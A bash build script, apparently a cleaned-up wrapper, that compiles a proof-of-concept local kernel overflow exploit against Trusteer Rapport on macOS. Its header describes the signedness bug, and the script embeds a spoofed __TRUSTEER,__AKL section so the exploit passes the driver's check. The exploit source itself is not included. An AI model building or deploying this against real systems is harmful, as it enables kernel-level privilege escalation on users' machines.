#!/bin/bash
#/* rapport-smash-v2.c
# *
# * Copyright (c) 2017 by <mu-b@digit-labs.org>
# *
# * Trusteer Rapport local kernel overflow exploit - gakl_driver_2 PoC
# * by mu-b - Sat 11 Nov 2017
# *
# * $Id: rapport-smash-v2.sh 44 2019-02-28 09:30:17Z mu-b $
# *
# * - Tested on: Trusteer Rapport (Apple MACOS X 10.12.2)
# *
# * signedness bug in num_pids leading to integer overflow and thus controllable
# * overflow into data segment.
# *
# * compile: ./rapport-smash-v2.sh
# *
# *    - Private Source Code -DO NOT DISTRIBUTE -
# * http://www.digit-labs.org/ -- Digit-Labs 2017!@$!
# */

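# Build wrapper: links the PoC source ($EXPFILE.c) with a generated Mach-O
# section (__TRUSTEER,__AKL) whose contents come from a temporary file.
# Exit status is 0 when the binary already exists or was built, 1 on any
# failure (the original exited 0 on failure because `exit $?` evaluated
# the status of the preceding echo, not of mktemp/gcc).
set -u

EXPFILE=rapport-smash-v2

# Banner.  Single-quoted printf formats so the text is emitted verbatim;
# in the original the "$!" inside double quotes was expanded by the shell
# (to the last background PID, i.e. nothing) instead of being printed.
printf 'Trusteer Rapport local kernel overflow exploit - gakl_driver_2\n'
printf 'by: <mu-b@digit-labs.org>\n'
printf 'http://www.digit-labs.org/ -- Digit-Labs 2017!@$!\n\n'

if [ ! -f "$EXPFILE" ]; then
  printf '* creating segment file...'
  script_name=$(basename -- "$0")
  # Assignment and status check are split so a mktemp failure is not masked.
  if ! TMPFILE=$(mktemp "/tmp/${script_name}.XXXXXX"); then
    printf ' failed\n'
    exit 1
  fi
  printf ' done\n'
  # Remove the temp file on every exit path (success, gcc failure, signal),
  # not only after a completed compile as the original did.
  trap 'rm -f -- "$TMPFILE"' EXIT

  # Payload for the __TRUSTEER,__AKL section; written without a trailing newline.
  if ! printf '%s' 'VALIDATE_CHECK_DATA' > "$TMPFILE"; then
    printf ' failed\n'
    exit 1
  fi

  printf '* compiling exploit...'
  # -sectcreate SEGNAME SECTNAME FILE embeds $TMPFILE as section __AKL of
  # segment __TRUSTEER.  The status checked here is gcc's own; the original
  # ran `rm $TMPFILE` in between and therefore tested rm's status instead.
  if ! gcc -Wall "$EXPFILE.c" -o "$EXPFILE" -framework IOKit -arch i386 \
       -Xlinker -sectcreate -Xlinker __TRUSTEER -Xlinker __AKL -Xlinker "$TMPFILE"; then
    printf ' failed\n'
    exit 1
  fi
  printf ' done\n'
fi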
